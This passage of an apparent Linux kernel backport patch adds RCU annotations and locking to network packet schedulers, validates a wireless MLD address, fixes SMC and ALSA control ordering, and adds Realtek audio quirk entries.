+ 	[TCA_FQ_PIE_FLOWS]		= {.type = NLA_U32},
+@@ -208,7 +213,8 @@ static const struct nla_policy fq_pie_policy[TCA_FQ_PIE_MAX + 1] = {
+ 	[TCA_FQ_PIE_TUPDATE]		= {.type = NLA_U32},
+ 	[TCA_FQ_PIE_ALPHA]		= {.type = NLA_U32},
+ 	[TCA_FQ_PIE_BETA]		= {.type = NLA_U32},
+-	[TCA_FQ_PIE_QUANTUM]		= {.type = NLA_U32},
++	[TCA_FQ_PIE_QUANTUM]		=
++			NLA_POLICY_FULL_RANGE(NLA_U32, &fq_pie_q_range),
+ 	[TCA_FQ_PIE_MEMORY_LIMIT]	= {.type = NLA_U32},
+ 	[TCA_FQ_PIE_ECN_PROB]		= {.type = NLA_U32},
+ 	[TCA_FQ_PIE_ECN]		= {.type = NLA_U32},
+@@ -373,6 +379,7 @@ static void fq_pie_timer(struct timer_list *t)
+ 	spinlock_t *root_lock; /* to lock qdisc for probability calculations */
+ 	u32 idx;
+ 
++	rcu_read_lock();
+ 	root_lock = qdisc_lock(qdisc_root_sleeping(sch));
+ 	spin_lock(root_lock);
+ 
+@@ -385,6 +392,7 @@ static void fq_pie_timer(struct timer_list *t)
+ 		mod_timer(&q->adapt_timer, jiffies + q->p_params.tupdate);
+ 
+ 	spin_unlock(root_lock);
++	rcu_read_unlock();
+ }
+ 
+ static int fq_pie_init(struct Qdisc *sch, struct nlattr *opt,
+diff --git a/net/sched/sch_generic.c b/net/sched/sch_generic.c
+index a9aadc4e68581..ee43e8ac039ed 100644
+--- a/net/sched/sch_generic.c
++++ b/net/sched/sch_generic.c
+@@ -648,7 +648,7 @@ struct Qdisc_ops noop_qdisc_ops __read_mostly = {
+ 
+ static struct netdev_queue noop_netdev_queue = {
+ 	RCU_POINTER_INITIALIZER(qdisc, &noop_qdisc),
+-	.qdisc_sleeping	=	&noop_qdisc,
++	RCU_POINTER_INITIALIZER(qdisc_sleeping, &noop_qdisc),
+ };
+ 
+ struct Qdisc noop_qdisc = {
+@@ -1103,7 +1103,7 @@ EXPORT_SYMBOL(qdisc_put_unlocked);
+ struct Qdisc *dev_graft_qdisc(struct netdev_queue *dev_queue,
+ 			      struct Qdisc *qdisc)
+ {
+-	struct Qdisc *oqdisc = dev_queue->qdisc_sleeping;
++	struct Qdisc *oqdisc = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 	spinlock_t *root_lock;
+ 
+ 	root_lock = qdisc_lock(oqdisc);
+@@ -1112,7 +1112,7 @@ struct Qdisc *dev_graft_qdisc(struct netdev_queue *dev_queue,
+ 	/* ... and graft new one */
+ 	if (qdisc == NULL)
+ 		qdisc = &noop_qdisc;
+-	dev_queue->qdisc_sleeping = qdisc;
++	rcu_assign_pointer(dev_queue->qdisc_sleeping, qdisc);
+ 	rcu_assign_pointer(dev_queue->qdisc, &noop_qdisc);
+ 
+ 	spin_unlock_bh(root_lock);
+@@ -1125,12 +1125,12 @@ static void shutdown_scheduler_queue(struct net_device *dev,
+ 				     struct netdev_queue *dev_queue,
+ 				     void *_qdisc_default)
+ {
+-	struct Qdisc *qdisc = dev_queue->qdisc_sleeping;
++	struct Qdisc *qdisc = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 	struct Qdisc *qdisc_default = _qdisc_default;
+ 
+ 	if (qdisc) {
+ 		rcu_assign_pointer(dev_queue->qdisc, qdisc_default);
+-		dev_queue->qdisc_sleeping = qdisc_default;
++		rcu_assign_pointer(dev_queue->qdisc_sleeping, qdisc_default);
+ 
+ 		qdisc_put(qdisc);
+ 	}
+@@ -1154,7 +1154,7 @@ static void attach_one_default_qdisc(struct net_device *dev,
+ 
+ 	if (!netif_is_multiqueue(dev))
+ 		qdisc->flags |= TCQ_F_ONETXQUEUE | TCQ_F_NOPARENT;
+-	dev_queue->qdisc_sleeping = qdisc;
++	rcu_assign_pointer(dev_queue->qdisc_sleeping, qdisc);
+ }
+ 
+ static void attach_default_qdiscs(struct net_device *dev)
+@@ -1167,7 +1167,7 @@ static void attach_default_qdiscs(struct net_device *dev)
+ 	if (!netif_is_multiqueue(dev) ||
+ 	    dev->priv_flags & IFF_NO_QUEUE) {
+ 		netdev_for_each_tx_queue(dev, attach_one_default_qdisc, NULL);
+-		qdisc = txq->qdisc_sleeping;
++		qdisc = rtnl_dereference(txq->qdisc_sleeping);
+ 		rcu_assign_pointer(dev->qdisc, qdisc);
+ 		qdisc_refcount_inc(qdisc);
+ 	} else {
+@@ -1186,7 +1186,7 @@ static void attach_default_qdiscs(struct net_device *dev)
+ 		netdev_for_each_tx_queue(dev, shutdown_scheduler_queue, &noop_qdisc);
+ 		dev->priv_flags |= IFF_NO_QUEUE;
+ 		netdev_for_each_tx_queue(dev, attach_one_default_qdisc, NULL);
+-		qdisc = txq->qdisc_sleeping;
++		qdisc = rtnl_dereference(txq->qdisc_sleeping);
+ 		rcu_assign_pointer(dev->qdisc, qdisc);
+ 		qdisc_refcount_inc(qdisc);
+ 		dev->priv_flags ^= IFF_NO_QUEUE;
+@@ -1202,7 +1202,7 @@ static void transition_one_qdisc(struct net_device *dev,
+ 				 struct netdev_queue *dev_queue,
+ 				 void *_need_watchdog)
+ {
+-	struct Qdisc *new_qdisc = dev_queue->qdisc_sleeping;
++	struct Qdisc *new_qdisc = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 	int *need_watchdog_p = _need_watchdog;
+ 
+ 	if (!(new_qdisc->flags & TCQ_F_BUILTIN))
+@@ -1272,7 +1272,7 @@ static void dev_reset_queue(struct net_device *dev,
+ 	struct Qdisc *qdisc;
+ 	bool nolock;
+ 
+-	qdisc = dev_queue->qdisc_sleeping;
++	qdisc = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 	if (!qdisc)
+ 		return;
+ 
+@@ -1303,7 +1303,7 @@ static bool some_qdisc_is_busy(struct net_device *dev)
+ 		int val;
+ 
+ 		dev_queue = netdev_get_tx_queue(dev, i);
+-		q = dev_queue->qdisc_sleeping;
++		q = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 
+ 		root_lock = qdisc_lock(q);
+ 		spin_lock_bh(root_lock);
+@@ -1379,7 +1379,7 @@ EXPORT_SYMBOL(dev_deactivate);
+ static int qdisc_change_tx_queue_len(struct net_device *dev,
+ 				     struct netdev_queue *dev_queue)
+ {
+-	struct Qdisc *qdisc = dev_queue->qdisc_sleeping;
++	struct Qdisc *qdisc = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 	const struct Qdisc_ops *ops = qdisc->ops;
+ 
+ 	if (ops->change_tx_queue_len)
+@@ -1404,7 +1404,7 @@ void mq_change_real_num_tx(struct Qdisc *sch, unsigned int new_real_tx)
+ 	unsigned int i;
+ 
+ 	for (i = new_real_tx; i < dev->real_num_tx_queues; i++) {
+-		qdisc = netdev_get_tx_queue(dev, i)->qdisc_sleeping;
++		qdisc = rtnl_dereference(netdev_get_tx_queue(dev, i)->qdisc_sleeping);
+ 		/* Only update the default qdiscs we created,
+ 		 * qdiscs with handles are always hashed.
+ 		 */
+@@ -1412,7 +1412,7 @@ void mq_change_real_num_tx(struct Qdisc *sch, unsigned int new_real_tx)
+ 			qdisc_hash_del(qdisc);
+ 	}
+ 	for (i = dev->real_num_tx_queues; i < new_real_tx; i++) {
+-		qdisc = netdev_get_tx_queue(dev, i)->qdisc_sleeping;
++		qdisc = rtnl_dereference(netdev_get_tx_queue(dev, i)->qdisc_sleeping);
+ 		if (qdisc != &noop_qdisc && !qdisc->handle)
+ 			qdisc_hash_add(qdisc, false);
+ 	}
+@@ -1449,7 +1449,7 @@ static void dev_init_scheduler_queue(struct net_device *dev,
+ 	struct Qdisc *qdisc = _qdisc;
+ 
+ 	rcu_assign_pointer(dev_queue->qdisc, qdisc);
+-	dev_queue->qdisc_sleeping = qdisc;
++	rcu_assign_pointer(dev_queue->qdisc_sleeping, qdisc);
+ }
+ 
+ void dev_init_scheduler(struct net_device *dev)
+diff --git a/net/sched/sch_mq.c b/net/sched/sch_mq.c
+index d0bc660d7401f..c860119a8f091 100644
+--- a/net/sched/sch_mq.c
++++ b/net/sched/sch_mq.c
+@@ -141,7 +141,7 @@ static int mq_dump(struct Qdisc *sch, struct sk_buff *skb)
+ 	 * qdisc totals are added at end.
+ 	 */
+ 	for (ntx = 0; ntx < dev->num_tx_queues; ntx++) {
+-		qdisc = netdev_get_tx_queue(dev, ntx)->qdisc_sleeping;
++		qdisc = rtnl_dereference(netdev_get_tx_queue(dev, ntx)->qdisc_sleeping);
+ 		spin_lock_bh(qdisc_lock(qdisc));
+ 
+ 		gnet_stats_add_basic(&sch->bstats, qdisc->cpu_bstats,
+@@ -202,7 +202,7 @@ static struct Qdisc *mq_leaf(struct Qdisc *sch, unsigned long cl)
+ {
+ 	struct netdev_queue *dev_queue = mq_queue_get(sch, cl);
+ 
+-	return dev_queue->qdisc_sleeping;
++	return rtnl_dereference(dev_queue->qdisc_sleeping);
+ }
+ 
+ static unsigned long mq_find(struct Qdisc *sch, u32 classid)
+@@ -221,7 +221,7 @@ static int mq_dump_class(struct Qdisc *sch, unsigned long cl,
+ 
+ 	tcm->tcm_parent = TC_H_ROOT;
+ 	tcm->tcm_handle |= TC_H_MIN(cl);
+-	tcm->tcm_info = dev_queue->qdisc_sleeping->handle;
++	tcm->tcm_info = rtnl_dereference(dev_queue->qdisc_sleeping)->handle;
+ 	return 0;
+ }
+ 
+@@ -230,7 +230,7 @@ static int mq_dump_class_stats(struct Qdisc *sch, unsigned long cl,
+ {
+ 	struct netdev_queue *dev_queue = mq_queue_get(sch, cl);
+ 
+-	sch = dev_queue->qdisc_sleeping;
++	sch = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 	if (gnet_stats_copy_basic(d, sch->cpu_bstats, &sch->bstats, true) < 0 ||
+ 	    qdisc_qstats_copy(d, sch) < 0)
+ 		return -1;
+diff --git a/net/sched/sch_mqprio.c b/net/sched/sch_mqprio.c
+index 4c68abaa289bd..9f26fb7d5823c 100644
+--- a/net/sched/sch_mqprio.c
++++ b/net/sched/sch_mqprio.c
+@@ -399,7 +399,7 @@ static int mqprio_dump(struct Qdisc *sch, struct sk_buff *skb)
+ 	 * qdisc totals are added at end.
+ 	 */
+ 	for (ntx = 0; ntx < dev->num_tx_queues; ntx++) {
+-		qdisc = netdev_get_tx_queue(dev, ntx)->qdisc_sleeping;
++		qdisc = rtnl_dereference(netdev_get_tx_queue(dev, ntx)->qdisc_sleeping);
+ 		spin_lock_bh(qdisc_lock(qdisc));
+ 
+ 		gnet_stats_add_basic(&sch->bstats, qdisc->cpu_bstats,
+@@ -449,7 +449,7 @@ static struct Qdisc *mqprio_leaf(struct Qdisc *sch, unsigned long cl)
+ 	if (!dev_queue)
+ 		return NULL;
+ 
+-	return dev_queue->qdisc_sleeping;
++	return rtnl_dereference(dev_queue->qdisc_sleeping);
+ }
+ 
+ static unsigned long mqprio_find(struct Qdisc *sch, u32 classid)
+@@ -482,7 +482,7 @@ static int mqprio_dump_class(struct Qdisc *sch, unsigned long cl,
+ 		tcm->tcm_parent = (tc < 0) ? 0 :
+ 			TC_H_MAKE(TC_H_MAJ(sch->handle),
+ 				  TC_H_MIN(tc + TC_H_MIN_PRIORITY));
+-		tcm->tcm_info = dev_queue->qdisc_sleeping->handle;
++		tcm->tcm_info = rtnl_dereference(dev_queue->qdisc_sleeping)->handle;
+ 	} else {
+ 		tcm->tcm_parent = TC_H_ROOT;
+ 		tcm->tcm_info = 0;
+@@ -538,7 +538,7 @@ static int mqprio_dump_class_stats(struct Qdisc *sch, unsigned long cl,
+ 	} else {
+ 		struct netdev_queue *dev_queue = mqprio_queue_get(sch, cl);
+ 
+-		sch = dev_queue->qdisc_sleeping;
++		sch = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 		if (gnet_stats_copy_basic(d, sch->cpu_bstats,
+ 					  &sch->bstats, true) < 0 ||
+ 		    qdisc_qstats_copy(d, sch) < 0)
+diff --git a/net/sched/sch_pie.c b/net/sched/sch_pie.c
+index 265c238047a42..b60b31ef71cc5 100644
+--- a/net/sched/sch_pie.c
++++ b/net/sched/sch_pie.c
+@@ -421,8 +421,10 @@ static void pie_timer(struct timer_list *t)
+ {
+ 	struct pie_sched_data *q = from_timer(q, t, adapt_timer);
+ 	struct Qdisc *sch = q->sch;
+-	spinlock_t *root_lock = qdisc_lock(qdisc_root_sleeping(sch));
++	spinlock_t *root_lock;
+ 
++	rcu_read_lock();
++	root_lock = qdisc_lock(qdisc_root_sleeping(sch));
+ 	spin_lock(root_lock);
+ 	pie_calculate_probability(&q->params, &q->vars, sch->qstats.backlog);
+ 
+@@ -430,6 +432,7 @@ static void pie_timer(struct timer_list *t)
+ 	if (q->params.tupdate)
+ 		mod_timer(&q->adapt_timer, jiffies + q->params.tupdate);
+ 	spin_unlock(root_lock);
++	rcu_read_unlock();
+ }
+ 
+ static int pie_init(struct Qdisc *sch, struct nlattr *opt,
+diff --git a/net/sched/sch_red.c b/net/sched/sch_red.c
+index 98129324e1573..16277b6a0238d 100644
+--- a/net/sched/sch_red.c
++++ b/net/sched/sch_red.c
+@@ -321,12 +321,15 @@ static inline void red_adaptative_timer(struct timer_list *t)
+ {
+ 	struct red_sched_data *q = from_timer(q, t, adapt_timer);
+ 	struct Qdisc *sch = q->sch;
+-	spinlock_t *root_lock = qdisc_lock(qdisc_root_sleeping(sch));
++	spinlock_t *root_lock;
+ 
++	rcu_read_lock();
++	root_lock = qdisc_lock(qdisc_root_sleeping(sch));
+ 	spin_lock(root_lock);
+ 	red_adaptative_algo(&q->parms, &q->vars);
+ 	mod_timer(&q->adapt_timer, jiffies + HZ/2);
+ 	spin_unlock(root_lock);
++	rcu_read_unlock();
+ }
+ 
+ static int red_init(struct Qdisc *sch, struct nlattr *opt,
+diff --git a/net/sched/sch_sfq.c b/net/sched/sch_sfq.c
+index abd436307d6a8..66dcb18638fea 100644
+--- a/net/sched/sch_sfq.c
++++ b/net/sched/sch_sfq.c
+@@ -606,10 +606,12 @@ static void sfq_perturbation(struct timer_list *t)
+ {
+ 	struct sfq_sched_data *q = from_timer(q, t, perturb_timer);
+ 	struct Qdisc *sch = q->sch;
+-	spinlock_t *root_lock = qdisc_lock(qdisc_root_sleeping(sch));
++	spinlock_t *root_lock;
+ 	siphash_key_t nkey;
+ 
+ 	get_random_bytes(&nkey, sizeof(nkey));
++	rcu_read_lock();
++	root_lock = qdisc_lock(qdisc_root_sleeping(sch));
+ 	spin_lock(root_lock);
+ 	q->perturbation = nkey;
+ 	if (!q->filter_list && q->tail)
+@@ -618,6 +620,7 @@ static void sfq_perturbation(struct timer_list *t)
+ 
+ 	if (q->perturb_period)
+ 		mod_timer(&q->perturb_timer, jiffies + q->perturb_period);
++	rcu_read_unlock();
+ }
+ 
+ static int sfq_change(struct Qdisc *sch, struct nlattr *opt)
+diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
+index c322a61eaeeac..a274a9332f333 100644
+--- a/net/sched/sch_taprio.c
++++ b/net/sched/sch_taprio.c
+@@ -2050,7 +2050,7 @@ static struct Qdisc *taprio_leaf(struct Qdisc *sch, unsigned long cl)
+ 	if (!dev_queue)
+ 		return NULL;
+ 
+-	return dev_queue->qdisc_sleeping;
++	return rtnl_dereference(dev_queue->qdisc_sleeping);
+ }
+ 
+ static unsigned long taprio_find(struct Qdisc *sch, u32 classid)
+@@ -2069,7 +2069,7 @@ static int taprio_dump_class(struct Qdisc *sch, unsigned long cl,
+ 
+ 	tcm->tcm_parent = TC_H_ROOT;
+ 	tcm->tcm_handle |= TC_H_MIN(cl);
+-	tcm->tcm_info = dev_queue->qdisc_sleeping->handle;
++	tcm->tcm_info = rtnl_dereference(dev_queue->qdisc_sleeping)->handle;
+ 
+ 	return 0;
+ }
+@@ -2081,7 +2081,7 @@ static int taprio_dump_class_stats(struct Qdisc *sch, unsigned long cl,
+ {
+ 	struct netdev_queue *dev_queue = taprio_queue_get(sch, cl);
+ 
+-	sch = dev_queue->qdisc_sleeping;
++	sch = rtnl_dereference(dev_queue->qdisc_sleeping);
+ 	if (gnet_stats_copy_basic(d, NULL, &sch->bstats, true) < 0 ||
+ 	    qdisc_qstats_copy(d, sch) < 0)
+ 		return -1;
+diff --git a/net/sched/sch_teql.c b/net/sched/sch_teql.c
+index 16f9238aa51d1..7721239c185fb 100644
+--- a/net/sched/sch_teql.c
++++ b/net/sched/sch_teql.c
+@@ -297,7 +297,7 @@ restart:
+ 		struct net_device *slave = qdisc_dev(q);
+ 		struct netdev_queue *slave_txq = netdev_get_tx_queue(slave, 0);
+ 
+-		if (slave_txq->qdisc_sleeping != q)
++		if (rcu_access_pointer(slave_txq->qdisc_sleeping) != q)
+ 			continue;
+ 		if (netif_xmit_stopped(netdev_get_tx_queue(slave, subq)) ||
+ 		    !netif_running(slave)) {
+diff --git a/net/smc/smc_llc.c b/net/smc/smc_llc.c
+index 3008dfdf7c55e..760f8bbff822e 100644
+--- a/net/smc/smc_llc.c
++++ b/net/smc/smc_llc.c
+@@ -851,6 +851,8 @@ static int smc_llc_add_link_cont(struct smc_link *link,
+ 	addc_llc->num_rkeys = *num_rkeys_todo;
+ 	n = *num_rkeys_todo;
+ 	for (i = 0; i < min_t(u8, n, SMC_LLC_RKEYS_PER_CONT_MSG); i++) {
++		while (*buf_pos && !(*buf_pos)->used)
++			*buf_pos = smc_llc_get_next_rmb(lgr, buf_lst, *buf_pos);
+ 		if (!*buf_pos) {
+ 			addc_llc->num_rkeys = addc_llc->num_rkeys -
+ 					      *num_rkeys_todo;
+@@ -867,8 +869,6 @@ static int smc_llc_add_link_cont(struct smc_link *link,
+ 
+ 		(*num_rkeys_todo)--;
+ 		*buf_pos = smc_llc_get_next_rmb(lgr, buf_lst, *buf_pos);
+-		while (*buf_pos && !(*buf_pos)->used)
+-			*buf_pos = smc_llc_get_next_rmb(lgr, buf_lst, *buf_pos);
+ 	}
+ 	addc_llc->hd.common.llc_type = SMC_LLC_ADD_LINK_CONT;
+ 	addc_llc->hd.length = sizeof(struct smc_llc_msg_add_link_cont);
+diff --git a/net/wireless/core.c b/net/wireless/core.c
+index 5b0c4d5b80cf5..b3ec9eaec36b3 100644
+--- a/net/wireless/core.c
++++ b/net/wireless/core.c
+@@ -368,12 +368,12 @@ static void cfg80211_sched_scan_stop_wk(struct work_struct *work)
+ 	rdev = container_of(work, struct cfg80211_registered_device,
+ 			   sched_scan_stop_wk);
+ 
+-	rtnl_lock();
++	wiphy_lock(&rdev->wiphy);
+ 	list_for_each_entry_safe(req, tmp, &rdev->sched_scan_req_list, list) {
+ 		if (req->nl_owner_dead)
+ 			cfg80211_stop_sched_scan_req(rdev, req, false);
+ 	}
+-	rtnl_unlock();
++	wiphy_unlock(&rdev->wiphy);
+ }
+ 
+ static void cfg80211_propagate_radar_detect_wk(struct work_struct *work)
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 7320d676ce3a5..087c0c442e231 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -10542,6 +10542,8 @@ static int nl80211_authenticate(struct sk_buff *skb, struct genl_info *info)
+ 		if (!info->attrs[NL80211_ATTR_MLD_ADDR])
+ 			return -EINVAL;
+ 		req.ap_mld_addr = nla_data(info->attrs[NL80211_ATTR_MLD_ADDR]);
++		if (!is_valid_ether_addr(req.ap_mld_addr))
++			return -EINVAL;
+ 	}
+ 
+ 	req.bss = cfg80211_get_bss(&rdev->wiphy, chan, bssid, ssid, ssid_len,
+diff --git a/sound/isa/gus/gus_pcm.c b/sound/isa/gus/gus_pcm.c
+index 230f65a0e4b07..388db5fb65bd0 100644
+--- a/sound/isa/gus/gus_pcm.c
++++ b/sound/isa/gus/gus_pcm.c
+@@ -892,10 +892,10 @@ int snd_gf1_pcm_new(struct snd_gus_card *gus, int pcm_dev, int control_index)
+ 		kctl = snd_ctl_new1(&snd_gf1_pcm_volume_control1, gus);
+ 	else
+ 		kctl = snd_ctl_new1(&snd_gf1_pcm_volume_control, gus);
++	kctl->id.index = control_index;
+ 	err = snd_ctl_add(card, kctl);
+ 	if (err < 0)
+ 		return err;
+-	kctl->id.index = control_index;
+ 
+ 	return 0;
+ }
+diff --git a/sound/pci/cmipci.c b/sound/pci/cmipci.c
+index 727db6d433916..6d25c12d9ef00 100644
+--- a/sound/pci/cmipci.c
++++ b/sound/pci/cmipci.c
+@@ -2688,20 +2688,20 @@ static int snd_cmipci_mixer_new(struct cmipci *cm, int pcm_spdif_device)
+ 		}
+ 		if (cm->can_ac3_hw) {
+ 			kctl = snd_ctl_new1(&snd_cmipci_spdif_default, cm);
++			kctl->id.device = pcm_spdif_device;
+ 			err = snd_ctl_add(card, kctl);
+ 			if (err < 0)
+ 				return err;
+-			kctl->id.device = pcm_spdif_device;
+ 			kctl = snd_ctl_new1(&snd_cmipci_spdif_mask, cm);
++			kctl->id.device = pcm_spdif_device;
+ 			err = snd_ctl_add(card, kctl);
+ 			if (err < 0)
+ 				return err;
+-			kctl->id.device = pcm_spdif_device;
+ 			kctl = snd_ctl_new1(&snd_cmipci_spdif_stream, cm);
++			kctl->id.device = pcm_spdif_device;
+ 			err = snd_ctl_add(card, kctl);
+ 			if (err < 0)
+ 				return err;
+-			kctl->id.device = pcm_spdif_device;
+ 		}
+ 		if (cm->chip_version <= 37) {
+ 			sw = snd_cmipci_old_mixer_switches;
+diff --git a/sound/pci/hda/hda_codec.c b/sound/pci/hda/hda_codec.c
+index 9f79c0ac2bda7..bd19f92aeeec8 100644
+--- a/sound/pci/hda/hda_codec.c
++++ b/sound/pci/hda/hda_codec.c
+@@ -2458,10 +2458,14 @@ int snd_hda_create_dig_out_ctls(struct hda_codec *codec,
+ 		   type == HDA_PCM_TYPE_HDMI) {
+ 		/* suppose a single SPDIF device */
+ 		for (dig_mix = dig_mixes; dig_mix->name; dig_mix++) {
++			struct snd_ctl_elem_id id;
++
+ 			kctl = find_mixer_ctl(codec, dig_mix->name, 0, 0);
+ 			if (!kctl)
+ 				break;
+-			kctl->id.index = spdif_index;
++			id = kctl->id;
++			id.index = spdif_index;
++			snd_ctl_rename_id(codec->card, &kctl->id, &id);
+ 		}
+ 		bus->primary_dig_out_type = HDA_PCM_TYPE_HDMI;
+ 	}
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 7b5f194513c7b..48a0e87136f1c 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9547,6 +9547,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1a8f, "ASUS UX582ZS", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1b11, "ASUS UX431DA", ALC294_FIXUP_ASUS_COEF_1B),
+ 	SND_PCI_QUIRK(0x1043, 0x1b13, "Asus U41SV", ALC269_FIXUP_INV_DMIC),
++	SND_PCI_QUIRK(0x1043, 0x1b93, "ASUS G614JVR/JIR", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1bbd, "ASUS Z550MA", ALC255_FIXUP_ASUS_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x1c23, "Asus X55U", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x1043, 0x1c62, "ASUS GU603", ALC289_FIXUP_ASUS_GA401),
+@@ -9565,6 +9566,11 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1f12, "ASUS UM5302", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1f92, "ASUS ROG Flow X16", ALC289_FIXUP_ASUS_GA401),
+ 	SND_PCI_QUIRK(0x1043, 0x3030, "ASUS ZN270IE", ALC256_FIXUP_ASUS_AIO_GPIO2),
++	SND_PCI_QUIRK(0x1043, 0x3a20, "ASUS G614JZR", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x3a30, "ASUS G814JVR/JIR", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x3a40, "ASUS G814JZR", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x3a50, "ASUS G834JYR/JZR", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x3a60, "ASUS G634JYR/JZR", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x831a, "ASUS P901", ALC269_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x1043, 0x834a, "ASUS S101", ALC269_FIXUP_STEREO_DMIC),
+ 	SND_PCI_QUIRK(0x1043, 0x8398, "ASUS P1005", ALC269_FIXUP_STEREO_DMIC),
+@@ -9636,6 +9642,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0x5101, "Clevo S510WU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x5157, "Clevo W517GU1", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x51a1, "Clevo NS50MU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0x51b1, "Clevo NS50AU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x5630, "Clevo NP50RNJS", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70a1, "Clevo NB70T[HJK]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0x70b3, "Clevo NK70SB", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -11694,6 +11701,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8719, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x872b, "HP", ALC897_FIXUP_HP_HSMIC_VERB),
+ 	SND_PCI_QUIRK(0x103c, 0x873e, "HP", ALC671_FIXUP_HP_HEADSET_MIC2),
++	SND_PCI_QUIRK(0x103c, 0x8768, "HP Slim Desktop S01", ALC671_FIXUP_HP_HEADSET_MIC2),
+ 	SND_PCI_QUIRK(0x103c, 0x877e, "HP 288 Pro G6", ALC671_FIXUP_HP_HEADSET_MIC2),
+ 	SND_PCI_QUIRK(0x103c, 0x885f, "HP 288 Pro G8", ALC671_FIXUP_HP_HEADSET_MIC2),
+ 	SND_PCI_QUIRK(0x1043, 0x1080, "Asus UX501VW", ALC668_FIXUP_HEADSET_MODE),
+@@ -11715,6 +11723,7 @@ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x14cd, 0x5003, "USI", ALC662_FIXUP_USI_HEADSET_MODE),
+ 	SND_PCI_QUIRK(0x17aa, 0x1036, "Lenovo P520", ALC662_FIXUP_LENOVO_MULTI_CODECS),
+ 	SND_PCI_QUIRK(0x17aa, 0x1057, "Lenovo P360", ALC897_FIXUP_HEADSET_MIC_PIN),
++	SND_PCI_QUIRK(0x17aa, 0x1064, "Lenovo P3 Tower", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x32ca, "Lenovo ThinkCentre M80", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x32cb, "Lenovo ThinkCentre M70", ALC897_FIXUP_HEADSET_MIC_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x32cf, "Lenovo ThinkCentre M950", ALC897_FIXUP_HEADSET_MIC_PIN),
+diff --git a/sound/pci/ice1712/aureon.c b/sound/pci/ice1712/aureon.c
+index 40a0e00950301..4b59f94ec348f 100644
+--- a/sound/pci/ice1712/aureon.c
++++ b/sound/pci/ice1712/aureon.c
+@@ -1903,11 +1903,12 @@ static int aureon_add_controls(struct snd_ice1712 *ice)
+ 		else {
+ 			for (i = 0; i < ARRAY_SIZE(cs8415_controls); i++) {
+ 				struct snd_kcontrol *kctl;
+-				err = snd_ctl_add(ice->card, (kctl = snd_ctl_new1(&cs8415_controls[i], ice)));
+-				if (err < 0)
+-					return err;
++				kctl = snd_ctl_new1(&cs8415_controls[i], ice);
+ 				if (i > 1)
+ 					kctl->id.device = ice->pcm->device;
++				err = snd_ctl_add(ice->card, kctl);
++				if (err < 0)
++					return err;
+ 			}
+ 		}
+ 	}
+diff --git a/sound/pci/ice1712/ice1712.c b/sound/pci/ice1712/ice1712.c
+index a5241a287851c..3b0c3e70987b9 100644
+--- a/sound/pci/ice1712/ice1712.c
++++ b/sound/pci/ice1712/ice1712.c
+@@ -2371,22 +2371,26 @@ int snd_ice1712_spdif_build_controls(struct snd_ice1712 *ice)
+ 
+ 	if (snd_BUG_ON(!ice->pcm_pro))
+ 		return -EIO;
+-	err = snd_ctl_add(ice->card, kctl = snd_ctl_new1(&snd_ice1712_spdif_default, ice));
++	kctl = snd_ctl_new1(&snd_ice1712_spdif_default, ice);
++	kctl->id.device = ice->pcm_pro->device;
++	err = snd_ctl_add(ice->card, kctl);
+ 	if (err < 0)
+ 		return err;
++	kctl = snd_ctl_new1(&snd_ice1712_spdif_maskc, ice);
+ 	kctl->id.device = ice->pcm_pro->device;
